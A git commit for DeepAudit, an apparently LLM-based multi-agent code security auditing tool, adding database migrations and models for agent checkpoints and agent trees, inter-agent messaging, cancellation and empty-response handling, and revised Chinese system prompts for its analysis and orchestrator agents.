feat(agent): implement comprehensive agent architecture with knowledge base and persistence layer

- Add database migrations for agent checkpoints and tree node tracking
- Implement core agent execution framework with executor, state management, and message handling
- Create knowledge base system with framework-specific modules (Django, FastAPI, Flask, Express, React, Supabase)
- Add vulnerability knowledge modules covering authentication, cryptography, injection, XSS, XXE, SSRF, path traversal, deserialization, and race conditions
- Introduce new agent tools: thinking tool, reporting tool, and agent-specific utilities
- Implement LLM memory compression and prompt caching for improved performance
- Add agent registry and persistence layer for checkpoint management
- Refactor agent implementations (analysis, recon, verification, orchestrator) with enhanced capabilities
- Remove legacy agent implementations (analysis_v2, react_agent)
- Update API endpoints for agent task creation and project management
- Add frontend components for agent task creation and enhanced audit UI
- Consolidate agent service architecture with improved separation of concerns
- This refactoring provides a scalable foundation for multi-agent collaboration with knowledge-driven decision making and state persistence
This commit is contained in:
lintsinghua 2025-12-12 15:27:12 +08:00
parent 147dfbaf5e
commit f05c0073e1
63 changed files with 12304 additions and 792 deletions

View File

@ -0,0 +1,68 @@
"""Add agent checkpoint and tree node tables
Revision ID: 007_add_agent_checkpoint_tables
Revises: 006_add_agent_tables
Create Date: 2024-12-12
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '007_add_agent_checkpoint_tables'
down_revision = '006_add_agent_tables'
branch_labels = None
depends_on = None
def upgrade() -> None:
# Create agent_checkpoints table
op.create_table(
'agent_checkpoints',
sa.Column('id', sa.String(36), primary_key=True),
sa.Column('task_id', sa.String(36), sa.ForeignKey('agent_tasks.id', ondelete='CASCADE'), nullable=False, index=True),
sa.Column('agent_id', sa.String(50), nullable=False, index=True),
sa.Column('agent_name', sa.String(255), nullable=False),
sa.Column('agent_type', sa.String(50), nullable=False),
sa.Column('parent_agent_id', sa.String(50), nullable=True),
sa.Column('state_data', sa.Text, nullable=False),
sa.Column('iteration', sa.Integer, default=0),
sa.Column('status', sa.String(30), nullable=False),
sa.Column('total_tokens', sa.Integer, default=0),
sa.Column('tool_calls', sa.Integer, default=0),
sa.Column('findings_count', sa.Integer, default=0),
sa.Column('checkpoint_type', sa.String(30), default='auto'),
sa.Column('checkpoint_name', sa.String(255), nullable=True),
sa.Column('checkpoint_metadata', sa.JSON, nullable=True),
sa.Column('created_at', sa.DateTime(timezone=True), server_default=sa.func.now(), index=True),
)
# Create agent_tree_nodes table
op.create_table(
'agent_tree_nodes',
sa.Column('id', sa.String(36), primary_key=True),
sa.Column('task_id', sa.String(36), sa.ForeignKey('agent_tasks.id', ondelete='CASCADE'), nullable=False, index=True),
sa.Column('agent_id', sa.String(50), nullable=False, unique=True, index=True),
sa.Column('agent_name', sa.String(255), nullable=False),
sa.Column('agent_type', sa.String(50), nullable=False),
sa.Column('parent_agent_id', sa.String(50), nullable=True, index=True),
sa.Column('depth', sa.Integer, default=0),
sa.Column('task_description', sa.Text, nullable=True),
sa.Column('knowledge_modules', sa.JSON, nullable=True),
sa.Column('status', sa.String(30), default='created'),
sa.Column('result_summary', sa.Text, nullable=True),
sa.Column('findings_count', sa.Integer, default=0),
sa.Column('iterations', sa.Integer, default=0),
sa.Column('tokens_used', sa.Integer, default=0),
sa.Column('tool_calls', sa.Integer, default=0),
sa.Column('duration_ms', sa.Integer, nullable=True),
sa.Column('created_at', sa.DateTime(timezone=True), server_default=sa.func.now()),
sa.Column('started_at', sa.DateTime(timezone=True), nullable=True),
sa.Column('finished_at', sa.DateTime(timezone=True), nullable=True),
)
def downgrade() -> None:
op.drop_table('agent_tree_nodes')
op.drop_table('agent_checkpoints')

View File

@ -0,0 +1,29 @@
"""merge_heads
Revision ID: 4c280754c680
Revises: 004_add_prompts_and_rules, 007_add_agent_checkpoint_tables
Create Date: 2025-12-12 12:07:42.238185
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '4c280754c680'
down_revision = ('004_add_prompts_and_rules', '007_add_agent_checkpoint_tables')
branch_labels = None
depends_on = None
def upgrade() -> None:
pass
def downgrade() -> None:
pass

File diff suppressed because it is too large Load Diff

View File

@ -676,15 +676,26 @@ async def get_project_branches(
repo_type = project.repository_type or "other" repo_type = project.repository_type or "other"
# 详细日志
print(f"[Branch] 项目: {project.name}, 类型: {repo_type}, URL: {project.repository_url}")
print(f"[Branch] GitHub Token: {'已配置' if github_token else '未配置'}, GitLab Token: {'已配置' if gitlab_token else '未配置'}")
try: try:
if repo_type == "github": if repo_type == "github":
if not github_token:
print("[Branch] 警告: GitHub Token 未配置,可能会遇到 API 限制")
branches = await get_github_branches(project.repository_url, github_token) branches = await get_github_branches(project.repository_url, github_token)
elif repo_type == "gitlab": elif repo_type == "gitlab":
if not gitlab_token:
print("[Branch] 警告: GitLab Token 未配置,可能无法访问私有仓库")
branches = await get_gitlab_branches(project.repository_url, gitlab_token) branches = await get_gitlab_branches(project.repository_url, gitlab_token)
else: else:
# 对于其他类型,返回默认分支 # 对于其他类型,返回默认分支
print(f"[Branch] 仓库类型 '{repo_type}' 不支持获取分支,返回默认分支")
branches = [project.default_branch or "main"] branches = [project.default_branch or "main"]
print(f"[Branch] 成功获取 {len(branches)} 个分支")
# 将默认分支放在第一位 # 将默认分支放在第一位
default_branch = project.default_branch or "main" default_branch = project.default_branch or "main"
if default_branch in branches: if default_branch in branches:
@ -694,7 +705,8 @@ async def get_project_branches(
return {"branches": branches, "default_branch": default_branch} return {"branches": branches, "default_branch": default_branch}
except Exception as e: except Exception as e:
print(f"获取分支列表失败: {e}") error_msg = str(e)
print(f"[Branch] 获取分支列表失败: {error_msg}")
# 返回默认分支作为后备 # 返回默认分支作为后备
return { return {
"branches": [project.default_branch or "main"], "branches": [project.default_branch or "main"],

View File

@ -442,3 +442,141 @@ class AgentFinding(Base):
"ai_confidence": self.ai_confidence, "ai_confidence": self.ai_confidence,
"created_at": self.created_at.isoformat() if self.created_at else None, "created_at": self.created_at.isoformat() if self.created_at else None,
} }
class AgentCheckpoint(Base):
"""
Agent 检查点
用于持久化 Agent 状态支持
- 任务恢复
- 状态回滚
- 执行历史追踪
"""
__tablename__ = "agent_checkpoints"
id = Column(String(36), primary_key=True, default=lambda: str(uuid.uuid4()))
task_id = Column(String(36), ForeignKey("agent_tasks.id", ondelete="CASCADE"), nullable=False, index=True)
# Agent 信息
agent_id = Column(String(50), nullable=False, index=True)
agent_name = Column(String(255), nullable=False)
agent_type = Column(String(50), nullable=False)
parent_agent_id = Column(String(50), nullable=True)
# 状态数据JSON 序列化的 AgentState
state_data = Column(Text, nullable=False)
# 执行状态
iteration = Column(Integer, default=0)
status = Column(String(30), nullable=False)
# 统计信息
total_tokens = Column(Integer, default=0)
tool_calls = Column(Integer, default=0)
findings_count = Column(Integer, default=0)
# 检查点类型
checkpoint_type = Column(String(30), default="auto") # auto, manual, error, final
checkpoint_name = Column(String(255), nullable=True)
# 元数据
checkpoint_metadata = Column(JSON, nullable=True)
# 时间戳
created_at = Column(DateTime(timezone=True), server_default=func.now(), index=True)
def __repr__(self):
return f"<AgentCheckpoint {self.agent_id} - iter {self.iteration}>"
def to_dict(self) -> dict:
"""转换为字典"""
return {
"id": self.id,
"task_id": self.task_id,
"agent_id": self.agent_id,
"agent_name": self.agent_name,
"agent_type": self.agent_type,
"parent_agent_id": self.parent_agent_id,
"iteration": self.iteration,
"status": self.status,
"total_tokens": self.total_tokens,
"tool_calls": self.tool_calls,
"findings_count": self.findings_count,
"checkpoint_type": self.checkpoint_type,
"checkpoint_name": self.checkpoint_name,
"created_at": self.created_at.isoformat() if self.created_at else None,
}
class AgentTreeNode(Base):
"""
Agent 树节点
记录动态 Agent 树的结构用于
- 可视化 Agent
- 追踪 Agent 间关系
- 分析执行流程
"""
__tablename__ = "agent_tree_nodes"
id = Column(String(36), primary_key=True, default=lambda: str(uuid.uuid4()))
task_id = Column(String(36), ForeignKey("agent_tasks.id", ondelete="CASCADE"), nullable=False, index=True)
# Agent 信息
agent_id = Column(String(50), nullable=False, unique=True, index=True)
agent_name = Column(String(255), nullable=False)
agent_type = Column(String(50), nullable=False)
# 树结构
parent_agent_id = Column(String(50), nullable=True, index=True)
depth = Column(Integer, default=0) # 树深度
# 任务信息
task_description = Column(Text, nullable=True)
knowledge_modules = Column(JSON, nullable=True)
# 执行状态
status = Column(String(30), default="created")
# 执行结果
result_summary = Column(Text, nullable=True)
findings_count = Column(Integer, default=0)
# 统计
iterations = Column(Integer, default=0)
tokens_used = Column(Integer, default=0)
tool_calls = Column(Integer, default=0)
duration_ms = Column(Integer, nullable=True)
# 时间戳
created_at = Column(DateTime(timezone=True), server_default=func.now())
started_at = Column(DateTime(timezone=True), nullable=True)
finished_at = Column(DateTime(timezone=True), nullable=True)
def __repr__(self):
return f"<AgentTreeNode {self.agent_name} ({self.agent_id})>"
def to_dict(self) -> dict:
"""转换为字典"""
return {
"id": self.id,
"task_id": self.task_id,
"agent_id": self.agent_id,
"agent_name": self.agent_name,
"agent_type": self.agent_type,
"parent_agent_id": self.parent_agent_id,
"depth": self.depth,
"task_description": self.task_description,
"knowledge_modules": self.knowledge_modules,
"status": self.status,
"result_summary": self.result_summary,
"findings_count": self.findings_count,
"iterations": self.iterations,
"tokens_used": self.tokens_used,
"tool_calls": self.tool_calls,
"duration_ms": self.duration_ms,
"created_at": self.created_at.isoformat() if self.created_at else None,
"started_at": self.started_at.isoformat() if self.started_at else None,
"finished_at": self.finished_at.isoformat() if self.finished_at else None,
}

View File

@ -2,16 +2,17 @@
DeepAudit Agent 服务模块 DeepAudit Agent 服务模块
基于 LangGraph AI Agent 代码安全审计 基于 LangGraph AI Agent 代码安全审计
架构: 架构升级版本 - 支持
LangGraph 状态图工作流 - 动态Agent树结构
- 专业知识模块系统
- Agent间通信机制
- 完整状态管理
- Think工具和漏洞报告工具
工作流:
START Recon Analysis Verification Report END START Recon Analysis Verification Report END
节点: 支持动态创建子Agent进行专业化分析
- Recon: 信息收集 (项目结构技术栈入口点)
- Analysis: 漏洞分析 (静态分析RAG模式匹配)
- Verification: 漏洞验证 (LLM 验证沙箱测试)
- Report: 报告生成
""" """
# 从 graph 模块导入主要组件 # 从 graph 模块导入主要组件
@ -32,6 +33,29 @@ from .agents import (
OrchestratorAgent, ReconAgent, AnalysisAgent, VerificationAgent, OrchestratorAgent, ReconAgent, AnalysisAgent, VerificationAgent,
) )
# 🔥 新增:核心模块(状态管理、注册表、消息)
from .core import (
AgentState, AgentStatus,
AgentRegistry, agent_registry,
AgentMessage, MessageType, MessagePriority, MessageBus,
)
# 🔥 新增知识模块系统基于RAG
from .knowledge import (
KnowledgeLoader, knowledge_loader,
get_available_modules, get_module_content,
SecurityKnowledgeRAG, security_knowledge_rag,
SecurityKnowledgeQueryTool, GetVulnerabilityKnowledgeTool,
)
# 🔥 新增:协作工具
from .tools import (
ThinkTool, ReflectTool,
CreateVulnerabilityReportTool,
CreateSubAgentTool, SendMessageTool, ViewAgentGraphTool,
WaitForMessageTool, AgentFinishTool,
)
__all__ = [ __all__ = [
# 核心 Runner # 核心 Runner
"AgentRunner", "AgentRunner",
@ -54,5 +78,35 @@ __all__ = [
"ReconAgent", "ReconAgent",
"AnalysisAgent", "AnalysisAgent",
"VerificationAgent", "VerificationAgent",
# 🔥 核心模块
"AgentState",
"AgentStatus",
"AgentRegistry",
"agent_registry",
"AgentMessage",
"MessageType",
"MessagePriority",
"MessageBus",
# 🔥 知识模块基于RAG
"KnowledgeLoader",
"knowledge_loader",
"get_available_modules",
"get_module_content",
"SecurityKnowledgeRAG",
"security_knowledge_rag",
"SecurityKnowledgeQueryTool",
"GetVulnerabilityKnowledgeTool",
# 🔥 协作工具
"ThinkTool",
"ReflectTool",
"CreateVulnerabilityReportTool",
"CreateSubAgentTool",
"SendMessageTool",
"ViewAgentGraphTool",
"WaitForMessageTool",
"AgentFinishTool",
] ]

View File

@ -46,8 +46,6 @@ ANALYSIS_SYSTEM_PROMPT = """你是 DeepAudit 的漏洞分析 Agent一个**自
### 深度分析 ### 深度分析
- **pattern_match**: 危险模式匹配 - **pattern_match**: 危险模式匹配
参数: pattern (str), file_types (list) 参数: pattern (str), file_types (list)
- **code_analysis**: LLM 深度代码分析
参数: code (str), file_path (str), focus (str)
- **dataflow_analysis**: 数据流追踪 - **dataflow_analysis**: 数据流追踪
参数: source (str), sink (str) 参数: source (str), sink (str)
@ -114,7 +112,7 @@ Final Answer: [JSON 格式的漏洞报告]
## 分析策略建议 ## 分析策略建议
1. **快速扫描**: 先用 semgrep_scan 获得概览 1. **快速扫描**: 先用 semgrep_scan 获得概览
2. **重点深入**: 对可疑文件使用 read_file + code_analysis 2. **重点深入**: 对可疑文件使用 read_file + pattern_match
3. **模式搜索**: search_code 找危险模式 (eval, exec, query ) 3. **模式搜索**: search_code 找危险模式 (eval, exec, query )
4. **语义搜索**: RAG 找相似的漏洞模式 4. **语义搜索**: RAG 找相似的漏洞模式
5. **数据流**: dataflow_analysis 追踪用户输入 5. **数据流**: dataflow_analysis 追踪用户输入
@ -268,6 +266,9 @@ class AnalysisAgent(BaseAgent):
# 🔥 构建包含交接上下文的初始消息 # 🔥 构建包含交接上下文的初始消息
handoff_context = self.get_handoff_context() handoff_context = self.get_handoff_context()
# 🔥 获取目标文件列表
target_files = config.get("target_files", [])
initial_message = f"""请开始对项目进行安全漏洞分析。 initial_message = f"""请开始对项目进行安全漏洞分析。
## 项目信息 ## 项目信息
@ -275,7 +276,22 @@ class AnalysisAgent(BaseAgent):
- 语言: {tech_stack.get('languages', [])} - 语言: {tech_stack.get('languages', [])}
- 框架: {tech_stack.get('frameworks', [])} - 框架: {tech_stack.get('frameworks', [])}
{handoff_context if handoff_context else f'''## 上下文信息 """
# 🔥 如果指定了目标文件,明确告知 Agent
if target_files:
initial_message += f"""## ⚠️ 审计范围
用户指定了 {len(target_files)} 个目标文件进行审计
"""
for tf in target_files[:10]:
initial_message += f"- {tf}\n"
if len(target_files) > 10:
initial_message += f"- ... 还有 {len(target_files) - 10} 个文件\n"
initial_message += """
请直接分析这些指定的文件不要分析其他文件
"""
initial_message += f"""{handoff_context if handoff_context else f'''## 上下文信息
### 高风险区域 ### 高风险区域
{json.dumps(high_risk_areas[:20], ensure_ascii=False)} {json.dumps(high_risk_areas[:20], ensure_ascii=False)}
@ -307,6 +323,7 @@ class AnalysisAgent(BaseAgent):
self._steps = [] self._steps = []
all_findings = [] all_findings = []
error_message = None # 🔥 跟踪错误信息
await self.emit_thinking("🔬 Analysis Agent 启动LLM 开始自主安全分析...") await self.emit_thinking("🔬 Analysis Agent 启动LLM 开始自主安全分析...")
@ -323,11 +340,12 @@ class AnalysisAgent(BaseAgent):
break break
# 调用 LLM 进行思考和决策(流式输出) # 调用 LLM 进行思考和决策(流式输出)
# 🔥 增加 max_tokens 到 4096避免长输出被截断
try: try:
llm_output, tokens_this_round = await self.stream_llm_call( llm_output, tokens_this_round = await self.stream_llm_call(
self._conversation_history, self._conversation_history,
temperature=0.1, temperature=0.1,
max_tokens=2048, max_tokens=4096,
) )
except asyncio.CancelledError: except asyncio.CancelledError:
logger.info(f"[{self.name}] LLM call cancelled") logger.info(f"[{self.name}] LLM call cancelled")
@ -338,13 +356,22 @@ class AnalysisAgent(BaseAgent):
# 🔥 Handle empty LLM response to prevent loops # 🔥 Handle empty LLM response to prevent loops
if not llm_output or not llm_output.strip(): if not llm_output or not llm_output.strip():
logger.warning(f"[{self.name}] Empty LLM response in iteration {self._iteration}") logger.warning(f"[{self.name}] Empty LLM response in iteration {self._iteration}")
await self.emit_llm_decision("收到空响应", "LLM 返回内容为空,尝试重试通过提示") empty_retry_count = getattr(self, '_empty_retry_count', 0) + 1
self._empty_retry_count = empty_retry_count
if empty_retry_count >= 3:
logger.error(f"[{self.name}] Too many empty responses, stopping")
error_message = "连续收到空响应,停止分析"
await self.emit_event("error", error_message)
break
self._conversation_history.append({ self._conversation_history.append({
"role": "user", "role": "user",
"content": "Received empty response. Please output your Thought and Action.", "content": "Received empty response. Please output your Thought and Action.",
}) })
continue continue
# 重置空响应计数器
self._empty_retry_count = 0
# 解析 LLM 响应 # 解析 LLM 响应
step = self._parse_llm_response(llm_output) step = self._parse_llm_response(llm_output)
self._steps.append(step) self._steps.append(step)
@ -396,6 +423,11 @@ class AnalysisAgent(BaseAgent):
step.action_input or {} step.action_input or {}
) )
# 🔥 工具执行后检查取消状态
if self.is_cancelled:
logger.info(f"[{self.name}] Cancelled after tool execution")
break
step.observation = observation step.observation = observation
# 🔥 发射 LLM 观察事件 # 🔥 发射 LLM 观察事件
@ -414,9 +446,96 @@ class AnalysisAgent(BaseAgent):
"content": "请继续分析。选择一个工具执行,或者如果分析完成,输出 Final Answer 汇总所有发现。", "content": "请继续分析。选择一个工具执行,或者如果分析完成,输出 Final Answer 汇总所有发现。",
}) })
# 🔥 如果循环结束但没有发现,强制 LLM 总结
if not all_findings and not self.is_cancelled and not error_message:
await self.emit_thinking("📝 分析阶段结束,正在生成漏洞总结...")
# 添加强制总结的提示
self._conversation_history.append({
"role": "user",
"content": """分析阶段已结束。请立即输出 Final Answer总结你发现的所有安全问题。
即使没有发现严重漏洞也请总结你的分析过程和观察到的潜在风险点
请按以下 JSON 格式输出
```json
{
"findings": [
{
"vulnerability_type": "sql_injection|xss|command_injection|path_traversal|ssrf|hardcoded_secret|other",
"severity": "critical|high|medium|low",
"title": "漏洞标题",
"description": "详细描述",
"file_path": "文件路径",
"line_start": 行号,
"code_snippet": "相关代码片段",
"suggestion": "修复建议"
}
],
"summary": "分析总结"
}
```
Final Answer:""",
})
try:
summary_output, _ = await self.stream_llm_call(
self._conversation_history,
temperature=0.1,
max_tokens=4096,
)
if summary_output and summary_output.strip():
# 解析总结输出
import re
summary_text = summary_output.strip()
summary_text = re.sub(r'```json\s*', '', summary_text)
summary_text = re.sub(r'```\s*', '', summary_text)
parsed_result = AgentJsonParser.parse(
summary_text,
default={"findings": [], "summary": ""}
)
if "findings" in parsed_result:
all_findings = parsed_result["findings"]
except Exception as e:
logger.warning(f"[{self.name}] Failed to generate summary: {e}")
# 处理结果 # 处理结果
duration_ms = int((time.time() - start_time) * 1000) duration_ms = int((time.time() - start_time) * 1000)
# 🔥 如果被取消,返回取消结果
if self.is_cancelled:
await self.emit_event(
"info",
f"🛑 Analysis Agent 已取消: {len(all_findings)} 个发现, {self._iteration} 轮迭代"
)
return AgentResult(
success=False,
error="任务已取消",
data={"findings": all_findings},
iterations=self._iteration,
tool_calls=self._tool_calls,
tokens_used=self._total_tokens,
duration_ms=duration_ms,
)
# 🔥 如果有错误,返回失败结果
if error_message:
await self.emit_event(
"error",
f"❌ Analysis Agent 失败: {error_message}"
)
return AgentResult(
success=False,
error=error_message,
data={"findings": all_findings},
iterations=self._iteration,
tool_calls=self._tool_calls,
tokens_used=self._total_tokens,
duration_ms=duration_ms,
)
# 标准化发现 # 标准化发现
standardized_findings = [] standardized_findings = []
for finding in all_findings: for finding in all_findings:

View File

@ -6,6 +6,8 @@ Agent 基类
1. LLM Agent 的大脑全程参与决策 1. LLM Agent 的大脑全程参与决策
2. Agent 之间通过 TaskHandoff 传递结构化上下文 2. Agent 之间通过 TaskHandoff 传递结构化上下文
3. 事件分为流式事件前端展示和持久化事件数据库记录 3. 事件分为流式事件前端展示和持久化事件数据库记录
4. 支持动态Agent树和专业知识模块
5. 完整的状态管理和Agent间通信
""" """
from abc import ABC, abstractmethod from abc import ABC, abstractmethod
@ -17,6 +19,10 @@ import asyncio
import logging import logging
import uuid import uuid
from ..core.state import AgentState, AgentStatus
from ..core.registry import agent_registry
from ..core.message import message_bus, MessageType, AgentMessage
logger = logging.getLogger(__name__) logger = logging.getLogger(__name__)
@ -238,6 +244,11 @@ class BaseAgent(ABC):
1. 通过 TaskHandoff 接收前序 Agent 的上下文 1. 通过 TaskHandoff 接收前序 Agent 的上下文
2. 执行完成后生成 TaskHandoff 传递给下一个 Agent 2. 执行完成后生成 TaskHandoff 传递给下一个 Agent
3. 洞察和发现应该结构化记录 3. 洞察和发现应该结构化记录
动态Agent树
1. 支持动态创建子Agent
2. Agent间通过消息总线通信
3. 完整的状态管理和生命周期
""" """
def __init__( def __init__(
@ -246,6 +257,8 @@ class BaseAgent(ABC):
llm_service, llm_service,
tools: Dict[str, Any], tools: Dict[str, Any],
event_emitter=None, event_emitter=None,
parent_id: Optional[str] = None,
knowledge_modules: Optional[List[str]] = None,
): ):
""" """
初始化 Agent 初始化 Agent
@ -255,13 +268,30 @@ class BaseAgent(ABC):
llm_service: LLM 服务 llm_service: LLM 服务
tools: 可用工具字典 tools: 可用工具字典
event_emitter: 事件发射器 event_emitter: 事件发射器
parent_id: 父Agent ID用于动态Agent树
knowledge_modules: 要加载的知识模块
""" """
self.config = config self.config = config
self.llm_service = llm_service self.llm_service = llm_service
self.tools = tools self.tools = tools
self.event_emitter = event_emitter self.event_emitter = event_emitter
self.parent_id = parent_id
self.knowledge_modules = knowledge_modules or []
# 运行状态 # 🔥 生成唯一ID
self._agent_id = f"agent_{uuid.uuid4().hex[:8]}"
# 🔥 增强的状态管理
self._state = AgentState(
agent_id=self._agent_id,
agent_name=config.name,
agent_type=config.agent_type.value,
parent_id=parent_id,
max_iterations=config.max_iterations,
knowledge_modules=self.knowledge_modules,
)
# 运行状态(保持向后兼容)
self._iteration = 0 self._iteration = 0
self._total_tokens = 0 self._total_tokens = 0
self._tool_calls = 0 self._tool_calls = 0
@ -272,14 +302,170 @@ class BaseAgent(ABC):
self._insights: List[str] = [] # 收集的洞察 self._insights: List[str] = [] # 收集的洞察
self._work_completed: List[str] = [] # 完成的工作记录 self._work_completed: List[str] = [] # 完成的工作记录
# 🔥 是否已注册到注册表
self._registered = False
# 🔥 加载知识模块到系统提示词
if self.knowledge_modules:
self._load_knowledge_modules()
def _register_to_registry(self, task: Optional[str] = None) -> None:
"""注册到Agent注册表延迟注册在run时调用"""
logger.info(f"[AgentTree] _register_to_registry 被调用: {self.config.name} (id={self._agent_id}, parent={self.parent_id}, _registered={self._registered})")
if self._registered:
logger.warning(f"[AgentTree] {self.config.name} 已注册,跳过 (id={self._agent_id})")
return
logger.info(f"[AgentTree] 正在注册 Agent: {self.config.name} (id={self._agent_id}, parent={self.parent_id})")
agent_registry.register_agent(
agent_id=self._agent_id,
agent_name=self.config.name,
agent_type=self.config.agent_type.value,
task=task or self._state.task or "Initializing",
parent_id=self.parent_id,
agent_instance=self,
state=self._state,
knowledge_modules=self.knowledge_modules,
)
# 创建消息队列
message_bus.create_queue(self._agent_id)
self._registered = True
tree = agent_registry.get_agent_tree()
logger.info(f"[AgentTree] Agent 注册完成: {self.config.name}, 当前树节点数: {len(tree['nodes'])}")
def set_parent_id(self, parent_id: str) -> None:
"""设置父Agent ID在调度时调用"""
self.parent_id = parent_id
self._state.parent_id = parent_id
def _load_knowledge_modules(self) -> None:
"""加载知识模块到系统提示词"""
if not self.knowledge_modules:
return
try:
from ..knowledge import knowledge_loader
enhanced_prompt = knowledge_loader.build_system_prompt_with_modules(
self.config.system_prompt or "",
self.knowledge_modules,
)
self.config.system_prompt = enhanced_prompt
logger.info(f"[{self.name}] Loaded knowledge modules: {self.knowledge_modules}")
except Exception as e:
logger.warning(f"Failed to load knowledge modules: {e}")
@property @property
def name(self) -> str: def name(self) -> str:
return self.config.name return self.config.name
@property
def agent_id(self) -> str:
return self._agent_id
@property
def state(self) -> AgentState:
return self._state
@property @property
def agent_type(self) -> AgentType: def agent_type(self) -> AgentType:
return self.config.agent_type return self.config.agent_type
# ============ Agent间消息处理 ============
def check_messages(self) -> List[AgentMessage]:
"""
检查并处理收到的消息
Returns:
未读消息列表
"""
messages = message_bus.get_messages(
self._agent_id,
unread_only=True,
mark_as_read=True,
)
for msg in messages:
# 处理消息
if msg.from_agent == "user":
# 用户消息直接添加到对话历史
self._state.add_message("user", msg.content)
else:
# Agent间消息使用XML格式
self._state.add_message("user", msg.to_xml())
# 如果在等待状态,恢复执行
if self._state.is_waiting_for_input():
self._state.resume_from_waiting()
agent_registry.update_agent_status(self._agent_id, "running")
return messages
def has_pending_messages(self) -> bool:
"""检查是否有待处理的消息"""
return message_bus.has_unread_messages(self._agent_id)
def send_message_to_parent(
self,
content: str,
message_type: MessageType = MessageType.INFORMATION,
) -> None:
"""向父Agent发送消息"""
if self.parent_id:
message_bus.send_message(
from_agent=self._agent_id,
to_agent=self.parent_id,
content=content,
message_type=message_type,
)
def send_message_to_agent(
self,
target_id: str,
content: str,
message_type: MessageType = MessageType.INFORMATION,
) -> None:
"""向指定Agent发送消息"""
message_bus.send_message(
from_agent=self._agent_id,
to_agent=target_id,
content=content,
message_type=message_type,
)
# ============ 生命周期管理 ============
def on_start(self) -> None:
"""Agent开始执行时调用"""
self._state.start()
agent_registry.update_agent_status(self._agent_id, "running")
def on_complete(self, result: Dict[str, Any]) -> None:
"""Agent完成时调用"""
self._state.set_completed(result)
agent_registry.update_agent_status(self._agent_id, "completed", result)
# 向父Agent报告完成
if self.parent_id:
message_bus.send_completion_report(
from_agent=self._agent_id,
to_agent=self.parent_id,
summary=result.get("summary", "Task completed"),
findings=result.get("findings", []),
success=True,
)
def on_error(self, error: str) -> None:
"""Agent出错时调用"""
self._state.set_failed(error)
agent_registry.update_agent_status(self._agent_id, "failed", {"error": error})
@abstractmethod @abstractmethod
async def run(self, input_data: Dict[str, Any]) -> AgentResult: async def run(self, input_data: Dict[str, Any]) -> AgentResult:
""" """
@ -296,6 +482,7 @@ class BaseAgent(ABC):
def cancel(self): def cancel(self):
"""取消执行""" """取消执行"""
self._cancelled = True self._cancelled = True
logger.info(f"[{self.name}] Cancel requested")
@property @property
def is_cancelled(self) -> bool: def is_cancelled(self) -> bool:
@ -671,6 +858,35 @@ class BaseAgent(ABC):
"tokens_used": self._total_tokens, "tokens_used": self._total_tokens,
} }
# ============ Memory Compression ============
def compress_messages_if_needed(
self,
messages: List[Dict[str, str]],
max_tokens: int = 100000,
) -> List[Dict[str, str]]:
"""
如果消息历史过长自动压缩
Args:
messages: 消息列表
max_tokens: 最大token数
Returns:
压缩后的消息列表
"""
from ...llm.memory_compressor import MemoryCompressor
compressor = MemoryCompressor(max_total_tokens=max_tokens)
if compressor.should_compress(messages):
logger.info(f"[{self.name}] Compressing conversation history...")
compressed = compressor.compress_history(messages)
logger.info(f"[{self.name}] Compressed {len(messages)} -> {len(compressed)} messages")
return compressed
return messages
# ============ 统一的流式 LLM 调用 ============ # ============ 统一的流式 LLM 调用 ============
async def stream_llm_call( async def stream_llm_call(
@ -678,6 +894,7 @@ class BaseAgent(ABC):
messages: List[Dict[str, str]], messages: List[Dict[str, str]],
temperature: float = 0.1, temperature: float = 0.1,
max_tokens: int = 2048, max_tokens: int = 2048,
auto_compress: bool = True,
) -> Tuple[str, int]: ) -> Tuple[str, int]:
""" """
统一的流式 LLM 调用方法 统一的流式 LLM 调用方法
@ -688,13 +905,23 @@ class BaseAgent(ABC):
messages: 消息列表 messages: 消息列表
temperature: 温度 temperature: 温度
max_tokens: 最大 token max_tokens: 最大 token
auto_compress: 是否自动压缩过长的消息历史
Returns: Returns:
(完整响应内容, token数量) (完整响应内容, token数量)
""" """
# 🔥 自动压缩过长的消息历史
if auto_compress:
messages = self.compress_messages_if_needed(messages)
accumulated = "" accumulated = ""
total_tokens = 0 total_tokens = 0
# 🔥 在开始 LLM 调用前检查取消
if self.is_cancelled:
logger.info(f"[{self.name}] Cancelled before LLM call")
return "", 0
await self.emit_thinking_start() await self.emit_thinking_start()
try: try:
@ -705,6 +932,7 @@ class BaseAgent(ABC):
): ):
# 检查取消 # 检查取消
if self.is_cancelled: if self.is_cancelled:
logger.info(f"[{self.name}] Cancelled during LLM streaming")
break break
if chunk["type"] == "token": if chunk["type"] == "token":
@ -745,6 +973,10 @@ class BaseAgent(ABC):
Returns: Returns:
工具执行结果字符串 工具执行结果字符串
""" """
# 🔥 在执行工具前检查取消
if self.is_cancelled:
return "任务已取消"
tool = self.tools.get(tool_name) tool = self.tools.get(tool_name)
if not tool: if not tool:

View File

@ -79,7 +79,7 @@ Action Input: [JSON 参数]
``` ```
## 审计策略建议 ## 审计策略建议
- 先用 recon Agent 了解项目全貌 - 先用 recon Agent 了解项目全貌只需调度一次
- 根据 recon 结果 analysis Agent 重点审计高风险区域 - 根据 recon 结果 analysis Agent 重点审计高风险区域
- 发现可疑漏洞后 verification Agent 验证 - 发现可疑漏洞后 verification Agent 验证
- 随时根据新发现调整策略不要机械执行 - 随时根据新发现调整策略不要机械执行
@ -90,6 +90,15 @@ Action Input: [JSON 参数]
2. **动态调整** - 根据发现调整策略 2. **动态调整** - 根据发现调整策略
3. **主动决策** - 不要等待主动推进 3. **主动决策** - 不要等待主动推进
4. **质量优先** - 宁可深入分析几个真实漏洞不要浅尝辄止 4. **质量优先** - 宁可深入分析几个真实漏洞不要浅尝辄止
5. **避免重复** - 每个 Agent 通常只需要调度一次如果结果不理想尝试其他 Agent 或直接完成审计
## 处理子 Agent 结果
- Agent 返回的 Observation 包含它们的分析结果
- 即使结果看起来不完整也要基于已有信息继续推进
- 不要反复调度同一个 Agent 期望得到不同结果
- 如果 recon 完成后应该调度 analysis 进行深度分析
- 如果 analysis 完成后有发现可以调度 verification 验证
- 如果没有更多工作要做使用 finish 结束审计
现在基于项目信息开始你的审计工作""" 现在基于项目信息开始你的审计工作"""
@ -137,10 +146,31 @@ class OrchestratorAgent(BaseAgent):
self._steps: List[AgentStep] = [] self._steps: List[AgentStep] = []
self._all_findings: List[Dict] = [] self._all_findings: List[Dict] = []
# 🔥 存储运行时上下文,用于传递给子 Agent
self._runtime_context: Dict[str, Any] = {}
# 🔥 跟踪已调度的 Agent 任务,避免重复调度
self._dispatched_tasks: Dict[str, int] = {} # agent_name -> dispatch_count
